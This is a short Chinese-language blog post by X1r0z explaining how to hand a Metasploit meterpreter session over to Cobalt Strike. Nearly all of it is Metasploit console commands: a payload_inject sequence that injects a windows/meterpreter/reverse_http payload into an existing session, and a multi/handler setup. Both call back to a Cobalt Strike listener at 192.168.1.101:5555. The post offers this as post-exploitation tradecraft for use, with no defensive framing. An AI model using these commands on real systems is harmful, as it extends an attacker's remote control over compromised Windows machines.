msf 派生 cobalt strike 会话

| 热度 | 字数统计: 116 字 | 阅读时长: 1 分
1
2
metasploit IP:192.168.1.100 PORT:4444
Cobalt Strike IP:192.168.1.101 PORT:5555

有 meterpreter 会话

利用 payload_inject 模块注入新的 payload.

1
2
3
4
5
6
7
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.1.101
set lport 5555
set session 1
set disablepayloadhandler true
run

无 meterpreter 会话

在监听时将 LHOSTLPORT 改成 Cobalt Strike 对应的 IP 和 PORT.

1
2
3
4
5
6
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.1.101
set lport 5555
set disablepayloadhandler true
run

本文标题:msf 派生 cobalt strike 会话

文章作者:X1r0z

发布时间:2018年07月18日

原始链接:https://exp10it.cn/2018/07/18/2018-07-18-msf-spawn-cobalt-strike/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者.